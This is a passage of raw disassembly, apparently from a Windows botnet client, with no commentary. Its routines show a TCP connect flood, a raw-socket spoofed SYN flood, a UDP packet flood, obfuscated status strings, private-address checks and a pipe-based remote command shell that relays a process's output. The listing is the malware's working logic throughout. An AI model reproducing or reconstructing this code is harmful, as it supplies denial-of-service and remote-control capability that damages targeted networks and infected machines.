inc [ebp+arg_0]
call dword_43718C ; Sleep
jmp loc_41DB2E
; ---------------------------------------------------------------------------
loc_41DBBB: ; CODE XREF: sub_41DAA5+A9�j
push esi
call ebx ; dword_4372D4
push [ebp+var_34]
call sub_42355A
pop ecx
loc_41DBC7: ; CODE XREF: sub_41DAA5+4B�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_41DBD0: ; CODE XREF: sub_41DAA5+100�j
cmp [ebp+var_2C], 0
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
mov esi, offset aSSS_2 ; "%s %s -> %s"
jnz short loc_41DC07
cmp [ebp+var_30], 0
jnz short loc_41DC0D
lea eax, [ebp+var_C8]
push eax
push ebx
push edi
lea eax, [ebp+var_148]
push esi
push eax
push [ebp+var_8]
call sub_41CD84
add esp, 18h
loc_41DC07: ; CODE XREF: sub_41DAA5+13E�j
cmp [ebp+var_30], 0
jz short loc_41DC29
loc_41DC0D: ; CODE XREF: sub_41DAA5+144�j
lea eax, [ebp+var_C8]
push eax
push ebx
push edi
lea eax, [ebp+var_148]
push esi
push eax
push [ebp+var_8]
call sub_41CD0E
add esp, 18h
loc_41DC29: ; CODE XREF: sub_41DAA5+166�j
push [ebp+var_4]
call sub_429822
push [ebp+var_34]
call sub_42355A
pop ecx
pop ecx
push 0
call dword_437170 ; ExitThread
sub_41DAA5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DC43 proc near ; DATA XREF: sub_40A938+71DF�o
var_14C = dword ptr -14Ch
var_144 = byte ptr -144h
var_C4 = byte ptr -0C4h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
mov dword ptr [eax+12Ch], 1
mov eax, [ebp+var_14C]
xor ebx, ebx
mov [ebp+var_4], eax
push ebx
mov [ebp+arg_0], ebx
call sub_42A705
mov [ebp+var_8], eax
push 10h
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_429690
add esp, 10h
lea eax, [ebp+var_C4]
push eax
call dword_4372BC ; inet_addr
push [ebp+var_38]
mov [ebp+var_18], eax
mov [ebp+var_1C], 2
call dword_4372C0 ; ntohs
mov edi, dword_4372D4
mov [ebp+var_1A], ax
loc_41DCB8: ; CODE XREF: sub_41DC43+E4�j
cmp [ebp+var_38], ebx
jnz short loc_41DCC6
call sub_429ACC
mov [ebp+var_1A], ax
loc_41DCC6: ; CODE XREF: sub_41DC43+78�j
push 6
push 1
push 2
call dword_4372B8 ; socket
mov esi, eax
cmp esi, ebx
jl short loc_41DD29
lea eax, [ebp+var_C]
mov [ebp+var_C], 4
push eax
push 8004667Eh
push esi
call dword_43728C ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_4372C8 ; connect
push esi
call edi ; dword_4372D4
cmp [ebp+arg_0], 32h
jl short loc_41DD1B
push ebx
call sub_42A705
mov edx, [ebp+var_8]
pop ecx
mov ecx, [ebp+var_34]
add ecx, edx
cmp eax, ecx
jge short loc_41DD3E
mov [ebp+arg_0], ebx
loc_41DD1B: ; CODE XREF: sub_41DC43+C0�j
push [ebp+var_3C]
inc [ebp+arg_0]
call dword_43718C ; Sleep
jmp short loc_41DCB8
; ---------------------------------------------------------------------------
loc_41DD29: ; CODE XREF: sub_41DC43+93�j
push esi
call edi ; dword_4372D4
push [ebp+var_30]
call sub_42355A
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_41DD3E: ; CODE XREF: sub_41DC43+D3�j
cmp [ebp+var_28], 0
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
mov esi, offset aSSS_2 ; "%s %s -> %s"
jnz short loc_41DD75
cmp [ebp+var_2C], 0
jnz short loc_41DD7B
lea eax, [ebp+var_C4]
push eax
push ebx
push edi
lea eax, [ebp+var_144]
push esi
push eax
push [ebp+var_4]
call sub_41CD84
add esp, 18h
loc_41DD75: ; CODE XREF: sub_41DC43+10E�j
cmp [ebp+var_2C], 0
jz short loc_41DD97
loc_41DD7B: ; CODE XREF: sub_41DC43+114�j
lea eax, [ebp+var_C4]
push eax
push ebx
push edi
lea eax, [ebp+var_144]
push esi
push eax
push [ebp+var_4]
call sub_41CD0E
add esp, 18h
loc_41DD97: ; CODE XREF: sub_41DC43+136�j
push [ebp+var_30]
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
sub_41DC43 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DDA8 proc near ; DATA XREF: sub_40A938+738A�o
var_248 = dword ptr -248h
var_240 = byte ptr -240h
var_1C0 = byte ptr -1C0h
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_10F = byte ptr -10Fh
var_10E = word ptr -10Eh
var_10C = byte ptr -10Ch
var_E0 = byte ptr -0E0h
var_CC = word ptr -0CCh
var_CA = word ptr -0CAh
var_C8 = dword ptr -0C8h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = byte ptr -68h
var_66 = word ptr -66h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = byte ptr -60h
var_5F = byte ptr -5Fh
var_5E = word ptr -5Eh
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = word ptr -48h
var_46 = word ptr -46h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 248h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_248]
rep movsd
xor ecx, ecx
push 2
inc ecx
pop edx
mov [eax+12Ch], ecx
mov eax, [ebp+var_248]
push 4
mov [ebp+var_4], eax
pop eax
xor ebx, ebx
push 3
mov [ebp+var_BC], edx
pop esi
mov [ebp+var_B8], eax
push ebx
mov [ebp+var_B4], 5
mov [ebp+var_B0], 0B4h
mov [ebp+var_AC], eax
mov [ebp+var_A8], edx
mov [ebp+var_A4], 8
mov [ebp+var_A0], 0Ah
mov [ebp+var_9C], ebx
mov [ebp+var_98], ebx
mov [ebp+var_94], ebx
mov [ebp+var_90], ebx
mov [ebp+var_8C], ebx
mov [ebp+var_88], ebx
mov [ebp+var_84], ebx
mov [ebp+var_80], ebx
mov [ebp+var_7C], ecx
mov [ebp+var_78], esi
mov [ebp+var_74], esi
mov [ebp+var_70], ebx
mov [ebp+arg_0], ebx
call sub_42A705
mov [ebp+var_14], eax
pop ecx
lea eax, [ebp+var_1C0]
push eax
call dword_4372A0 ; gethostbyname
mov eax, [eax+0Ch]
push 0FFh
push esi
push 2
mov eax, [eax]
mov edi, [eax]
call dword_4372B8 ; socket
cmp eax, ebx
mov [ebp+var_C], eax
jge short loc_41DF0F
cmp [ebp+var_124], ebx
mov edi, dword_43716C
mov esi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
jnz short loc_41DECB
cmp [ebp+var_128], ebx
jnz short loc_41DED3
call edi ; dword_43716C
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push esi
lea eax, [ebp+var_240]
push offset aSSD ; "%s %s <%d>"
push eax
push [ebp+var_4]
call sub_41CD84
add esp, 18h
loc_41DECB: ; CODE XREF: sub_41DDA8+F9�j
cmp [ebp+var_128], ebx
jz short loc_41DEF3
loc_41DED3: ; CODE XREF: sub_41DDA8+101�j
call edi ; dword_43716C
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push esi
lea eax, [ebp+var_240]
push offset aSSD ; "%s %s <%d>"
push eax
push [ebp+var_4]
call sub_41CD0E
add esp, 18h
loc_41DEF3: ; CODE XREF: sub_41DDA8+129�j
push [ebp+var_C]
call dword_4372D4 ; closesocket
push [ebp+var_12C]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
loc_41DF0F: ; CODE XREF: sub_41DDA8+E6�j
xor eax, eax
loc_41DF11: ; CODE XREF: sub_41DDA8+178�j
mov cl, byte ptr [ebp+eax*4+var_BC]
mov [ebp+eax+var_28], cl
inc eax
cmp eax, 14h
jl short loc_41DF11
mov eax, [ebp+var_6C]
push [ebp+var_134]
mov esi, dword_4372C0
and al, 45h
or al, 45h
mov [ebp+var_68], 10h
mov [ebp+var_6C], eax
mov [ebp+var_62], 40h
mov [ebp+var_60], 40h
mov [ebp+var_5F], 6
mov [ebp+var_4C], ebx
mov [ebp+var_46], 0Ah
mov [ebp+var_48], bx
mov [ebp+var_32], bx
mov [ebp+var_34], bx
mov [ebp+var_38], bx
mov [ebp+var_3A], bx
mov [ebp+var_3C], bx
mov [ebp+var_3E], bx
mov [ebp+var_42], bx
mov [ebp+var_40], 1
mov [ebp+var_2E], 787Dh
mov [ebp+var_2A], bx
call esi ; dword_4372C0
movzx eax, ax
mov [ebp+var_8], eax
loc_41DF8B: ; CODE XREF: sub_41DDA8+351�j
call sub_429ACC
cdq
mov ecx, 0FFh
and edi, 0FFFFFFh
idiv ecx
shl edx, 18h
or edi, edx
cmp [ebp+var_134], ebx
jnz short loc_41DFB3
call sub_429ACC
mov [ebp+var_8], eax
loc_41DFB3: ; CODE XREF: sub_41DDA8+201�j
push 3Ch
call esi ; dword_4372C0
mov [ebp+var_66], ax
call sub_429ACC
mov [ebp+var_64], ax
lea eax, [ebp+var_1C0]
push eax
mov [ebp+var_5C], edi
call sub_41E326
mov [ebp+var_58], eax
mov [ebp+var_5E], bx
call sub_429ACC
mov [ebp+var_54], ax
mov ax, word ptr [ebp+var_8]
mov [ebp+var_52], ax
call sub_429ACC
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_8]
mov [ebp+var_CA], ax
lea eax, [ebp+var_1C0]
push eax
mov [ebp+var_2C], bx
mov [ebp+var_CC], 2
call sub_41E326
mov [ebp+var_C8], eax
lea eax, [ebp+var_6C]
push 14h
push eax
call sub_41E322
mov [ebp+var_5E], ax
call sub_429ACC
mov [ebp+var_10], eax
mov [ebp+var_1F], al
mov al, byte ptr [ebp+var_10+2]
mov [ebp+var_1E], ah
mov [ebp+var_1D], al
mov al, byte ptr [ebp+var_10+3]
mov [ebp+var_1C], al
lea eax, [ebp+var_1C0]
push eax
mov [ebp+var_118], edi
call sub_41E326
add esp, 14h
mov [ebp+var_114], eax
mov [ebp+var_110], bl
mov [ebp+var_10F], 6
push 28h
call esi ; dword_4372C0
mov [ebp+var_10E], ax
lea eax, [ebp+var_10C]
push 14h
push eax
lea eax, [ebp+var_54]
push eax
call sub_429350
lea eax, [ebp+var_E0]
push 14h
push eax
lea eax, [ebp+var_28]
push eax
call sub_429350
lea eax, [ebp+var_118]
push 34h
push eax
call sub_41E322
add esp, 20h
mov [ebp+var_2C], ax
lea eax, [ebp+var_CC]
push 10h
push eax
push ebx
lea eax, [ebp+var_6C]
push 3Ch
push eax
push [ebp+var_C]
call dword_437290 ; sendto
cmp [ebp+arg_0], 32h
jb short loc_41E0EA
push ebx
call sub_42A705
mov edx, [ebp+var_14]
pop ecx
mov ecx, [ebp+var_130]
add ecx, edx
cmp eax, ecx
jge short loc_41E0FE
mov [ebp+arg_0], ebx
loc_41E0EA: ; CODE XREF: sub_41DDA8+327�j
push [ebp+var_138]
inc [ebp+arg_0]
call dword_43718C ; Sleep
jmp loc_41DF8B
; ---------------------------------------------------------------------------
loc_41E0FE: ; CODE XREF: sub_41DDA8+33D�j
push [ebp+var_C]
call dword_4372D4 ; closesocket
cmp [ebp+var_124], ebx
mov esi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
mov edi, offset aSSS_2 ; "%s %s -> %s"
jnz short loc_41E141
cmp [ebp+var_128], ebx
jnz short loc_41E149
lea eax, [ebp+var_1C0]
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push esi
lea eax, [ebp+var_240]
push edi
push eax
push [ebp+var_4]
call sub_41CD84
add esp, 18h
loc_41E141: ; CODE XREF: sub_41DDA8+36F�j
cmp [ebp+var_128], ebx
jz short loc_41E169
loc_41E149: ; CODE XREF: sub_41DDA8+377�j
lea eax, [ebp+var_1C0]
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push esi
lea eax, [ebp+var_240]
push edi
push eax
push [ebp+var_4]
call sub_41CD0E
add esp, 18h
loc_41E169: ; CODE XREF: sub_41DDA8+39F�j
push [ebp+var_12C]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
sub_41DDA8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E17C proc near ; DATA XREF: sub_40A938+74FD�o
var_15C = dword ptr -15Ch
var_154 = byte ptr -154h
var_D4 = byte ptr -0D4h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 15Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_15C]
rep movsd
xor edi, edi
mov ebx, 2400h
inc edi
xor esi, esi
mov [eax+12Ch], edi
mov eax, [ebp+var_15C]
push ebx
mov [ebp+var_10], eax
mov [ebp+var_8], edi
mov [ebp+arg_0], esi
call sub_4296E8
push esi
mov [ebp+var_14], eax
call sub_42A705
mov [ebp+var_18], eax
mov eax, [ebp+var_44]
mov [ebp+var_1C], eax
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_429690
lea eax, [ebp+var_D4]
push eax
call sub_41E326
mov esi, dword_437184
add esp, 18h
mov [ebp+var_28], eax
mov [ebp+var_2C], 2
call esi ; dword_437184
mov [ebp+var_C], eax
jmp short loc_41E27F
; ---------------------------------------------------------------------------
loc_41E200: ; CODE XREF: sub_41E17C+114�j
call sub_429ACC
push 11h
push 2
push 2
mov [ebp+var_2A], ax
call dword_4372B8 ; socket
test eax, eax
mov [ebp+var_4], eax
jl loc_41E309
lea ecx, [ebp+var_8]
push 4
push ecx
push 8004667Eh
push 11h
push eax
mov [ebp+var_8], edi
call dword_437288 ; setsockopt
lea eax, [ebp+var_2C]
push 10h
push eax
push 0
push ebx
push [ebp+var_14]
push [ebp+var_4]
call dword_437290 ; sendto
push [ebp+var_4]
call sub_42F0D0
cmp [ebp+arg_0], 32h
pop ecx
jl short loc_41E273
push 0
call sub_42A705
mov edx, [ebp+var_18]
pop ecx
mov ecx, [ebp+var_1C]
add ecx, edx
cmp eax, ecx
jnb short loc_41E296
and [ebp+arg_0], 0
loc_41E273: ; CODE XREF: sub_41E17C+DD�j
push [ebp+var_4C]
inc [ebp+arg_0]
call dword_43718C ; Sleep
loc_41E27F: ; CODE XREF: sub_41E17C+82�j
call esi ; dword_437184
sub eax, [ebp+var_C]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+var_44]
jbe loc_41E200
loc_41E296: ; CODE XREF: sub_41E17C+F1�j
push [ebp+var_4]
call sub_42F0D0
cmp [ebp+var_38], 0
pop ecx
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
mov esi, offset aSSS_2 ; "%s %s -> %s"
jnz short loc_41E2D6
cmp [ebp+var_3C], 0
jnz short loc_41E2DC
lea eax, [ebp+var_D4]
push eax
push ebx
push edi
lea eax, [ebp+var_154]
push esi
push eax
push [ebp+var_10]
call sub_41CD84
add esp, 18h
loc_41E2D6: ; CODE XREF: sub_41E17C+136�j
cmp [ebp+var_3C], 0
jz short loc_41E2F8
loc_41E2DC: ; CODE XREF: sub_41E17C+13C�j
lea eax, [ebp+var_D4]
push eax
push ebx
push edi
lea eax, [ebp+var_154]
push esi
push eax
push [ebp+var_10]
call sub_41CD0E
add esp, 18h
loc_41E2F8: ; CODE XREF: sub_41E17C+15E�j
push [ebp+var_40]
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
loc_41E309: ; CODE XREF: sub_41E17C+9E�j
push eax
call dword_4372D4 ; closesocket
push [ebp+var_40]
call sub_42355A
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_41E17C endp
; =============== S U B R O U T I N E =======================================
sub_41E322 proc near ; CODE XREF: sub_41DDA8+27B�p
; sub_41DDA8+2FE�p ...
xor ax, ax
retn
sub_41E322 endp
; =============== S U B R O U T I N E =======================================
sub_41E326 proc near ; CODE XREF: .text:00403D7E�p
; sub_4044F6+89�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_456F5C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_41E34E
push [esp+arg_0]
call dword_456FB4 ; gethostbyname
test eax, eax
jnz short loc_41E347
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41E347: ; CODE XREF: sub_41E326+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_41E34E: ; CODE XREF: sub_41E326+D�j
retn
sub_41E326 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E34F proc near ; CODE XREF: sub_4020AA+55�p
; .text:00403E11�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call sub_429ACC
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
inc eax
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul dbl_437340
call sub_42A910
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_41E34F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E380 proc near ; DATA XREF: sub_420CC8+4C�o
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push 2
push [ebp+arg_0]
lea eax, [ebp+var_8]
push eax
call sub_4276B6
mov esi, offset a@_6 ; "@"
push esi
push [ebp+var_4]
call sub_429B8E
push esi
push 0
call sub_429B8E
push eax
call sub_41E326
add esp, 20h
mov [ebp+arg_0], eax
push eax
call dword_456FBC ; inet_ntoa
push eax
push offset dword_457C20
call dword_4370A4 ; lstrcpyA
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call dword_456EB8 ; gethostbyaddr
pop esi
test eax, eax
push 9Fh
jz short loc_41E3E5
push dword ptr [eax]
jmp short loc_41E3EA
; ---------------------------------------------------------------------------
loc_41E3E5: ; CODE XREF: sub_41E380+5F�j
push offset aCouldnTResolve ; "Couldn't resolve"
loc_41E3EA: ; CODE XREF: sub_41E380+63�j
push offset dword_457C38
call sub_429C40
add esp, 0Ch
xor eax, eax
leave
retn
sub_41E380 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E3FB proc near ; CODE XREF: sub_401B6E+155�p
; sub_4063FA+F1�p ...
var_30 = byte ptr -30h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jz loc_41E4CA
mov esi, dword_437174
push offset byte_454A34
push [ebp+arg_0]
call esi ; dword_437174
test eax, eax
jz loc_41E4CA
push 20h
lea eax, [ebp+var_30]
push [ebp+arg_0]
push eax
call sub_429C40
mov edi, offset dword_43AB8C
lea eax, [ebp+var_30]
push edi
push eax
call sub_429B8E
add esp, 14h
mov [ebp+var_10], eax
test eax, eax
jz short loc_41E4CA
xor ebx, ebx
inc ebx
loc_41E450: ; CODE XREF: sub_41E3FB+6B�j
push edi
push 0
call sub_429B8E
pop ecx
mov [ebp+ebx*4+var_10], eax
test eax, eax
pop ecx
jz short loc_41E4CA
inc ebx
cmp ebx, 4
jl short loc_41E450
mov edi, [ebp+var_10]
push offset a10 ; "10"
push edi
call esi ; dword_437174
test eax, eax
jz short loc_41E4C5
push offset a172 ; "172"
push edi
call esi ; dword_437174
test eax, eax
jnz short loc_41E491
push offset a16 ; "16"
push [ebp+var_C]
call esi ; dword_437174
test eax, eax
jz short loc_41E4C5
loc_41E491: ; CODE XREF: sub_41E3FB+86�j
push offset a192 ; "192"
push edi
call esi ; dword_437174
test eax, eax
jnz short loc_41E4AB
push offset a168 ; "168"
push [ebp+var_C]
call esi ; dword_437174
test eax, eax
jz short loc_41E4C5
loc_41E4AB: ; CODE XREF: sub_41E3FB+A0�j
push offset a90 ; "90"
push edi
call esi ; dword_437174
test eax, eax
jnz short loc_41E4CA
push offset dword_43A30C
push [ebp+var_C]
call esi ; dword_437174
test eax, eax
jnz short loc_41E4CA
loc_41E4C5: ; CODE XREF: sub_41E3FB+7A�j
; sub_41E3FB+94�j ...
xor eax, eax
inc eax
jmp short loc_41E4CC
; ---------------------------------------------------------------------------
loc_41E4CA: ; CODE XREF: sub_41E3FB+D�j
; sub_41E3FB+25�j ...
xor eax, eax
loc_41E4CC: ; CODE XREF: sub_41E3FB+CD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E3FB endp
; =============== S U B R O U T I N E =======================================
sub_41E4D1 proc near ; CODE XREF: sub_41E501+2A�p
; sub_41E539+59�p ...
mov eax, dword_4586D4
push esi
mov esi, dword_437044
cmp eax, 0FFFFFFFFh
jz short loc_41E4E5
push eax
call esi ; dword_437044
loc_41E4E5: ; CODE XREF: sub_41E4D1+F�j
mov eax, dword_4586DC
cmp eax, 0FFFFFFFFh
jz short loc_41E4F2
push eax
call esi ; dword_437044
loc_41E4F2: ; CODE XREF: sub_41E4D1+1C�j
mov eax, dword_4586D0
cmp eax, 0FFFFFFFFh
jz short loc_41E4FF
push eax
call esi ; dword_437044
loc_41E4FF: ; CODE XREF: sub_41E4D1+29�j
pop esi
retn
sub_41E4D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E501 proc near ; CODE XREF: sub_40A938+48E4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_4292D0
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push dword_4586D8
call dword_437078 ; WriteFile
test eax, eax
jnz short loc_41E534
call sub_41E4D1
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41E534: ; CODE XREF: sub_41E501+28�j
xor eax, eax
inc eax
leave
retn
sub_41E501 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E539 proc near ; CODE XREF: sub_41E59B+DB�p
; sub_41E59B+FA�p ...
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429A90
push offset byte_454A34
push [ebp+arg_0]
call dword_4370EC ; lstrcmpA
test eax, eax
jz short loc_41E57B
push 3E8h
call dword_43718C ; Sleep
push [ebp+arg_8]
push offset aS_5 ; "%s"
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD84
add esp, 10h
jmp short loc_41E597
; ---------------------------------------------------------------------------
loc_41E57B: ; CODE XREF: sub_41E539+1D�j
push [ebp+arg_8]
lea eax, [ebp+var_2710]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
call sub_41E4D1
loc_41E597: ; CODE XREF: sub_41E539+40�j
xor eax, eax
leave
retn
sub_41E539 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E59B proc near ; DATA XREF: sub_41E6F8+177�o
var_271C = byte ptr -271Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 271Ch
call sub_429A90
push ebx
push esi
push edi
mov esi, 2710h
xor edi, edi
mov ebx, offset dword_4586F4
loc_41E5B7: ; CODE XREF: sub_41E59B+7D�j
; sub_41E59B+E3�j
push esi
lea eax, [ebp+var_271C]
push edi
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_271C]
push esi
push eax
push dword_4586D4
call dword_4370F4 ; PeekNamedPipe
test eax, eax
jz loc_41E689
cmp [ebp+var_4], edi
jnz short loc_41E61A
lea eax, [ebp+var_8]
push eax
push dword_4586D0
call dword_4370F0 ; GetExitCodeProcess
test eax, eax
jz short loc_41E610
cmp [ebp+var_8], 103h
jnz loc_41E6AD
loc_41E610: ; CODE XREF: sub_41E59B+66�j
push 0Ah
call dword_43718C ; Sleep
jmp short loc_41E5B7
; ---------------------------------------------------------------------------
loc_41E61A: ; CODE XREF: sub_41E59B+52�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_41E631
loc_41E621: ; CODE XREF: sub_41E59B+94�j
cmp [ebp+eax+var_271C], 0Ah
jz short loc_41E683
inc eax
cmp eax, [ebp+var_4]
jb short loc_41E621
loc_41E631: ; CODE XREF: sub_41E59B+84�j
mov [ebp+var_4], 200h
loc_41E638: ; CODE XREF: sub_41E59B+EC�j
push esi
lea eax, [ebp+var_271C]
push edi
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_271C]
push eax
push dword_4586D4
call dword_437084 ; ReadFile
test eax, eax
jz short loc_41E6D5
lea eax, [ebp+var_271C]
push eax
push dword_4586E0
push ebx
call sub_41E539
add esp, 0Ch
jmp loc_41E5B7
; ---------------------------------------------------------------------------
loc_41E683: ; CODE XREF: sub_41E59B+8E�j
inc eax
mov [ebp+var_4], eax
jmp short loc_41E638
; ---------------------------------------------------------------------------
loc_41E689: ; CODE XREF: sub_41E59B+49�j
push offset aCouldNotReadDa ; "Could not read data from proccess.\r\n"
push dword_4586E0
push ebx
call sub_41E539
push [ebp+arg_0]
call sub_42355A
add esp, 10h
push 1
call dword_437170 ; ExitThread
loc_41E6AD: ; CODE XREF: sub_41E59B+6F�j
call sub_41E4D1
push offset aProccessHasTer ; "Proccess has terminated.\r\n"
push dword_4586E0
push ebx
call sub_41E539
push [ebp+arg_0]
call sub_42355A
add esp, 10h
push edi
call dword_437170 ; ExitThread
loc_41E6D5: ; CODE XREF: sub_41E59B+CB�j
push offset aCouldNotReadDa ; "Could not read data from proccess.\r\n"
push dword_4586E0
push ebx
call sub_41E539
push [ebp+arg_0]
call sub_42355A
add esp, 10h
push edi
call dword_437170 ; ExitThread
sub_41E59B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E6F8 proc near ; CODE XREF: sub_40A938+4777�p
var_2884 = byte ptr -2884h
var_174 = byte ptr -174h
var_70 = dword ptr -70h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2884h
call sub_429A90
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
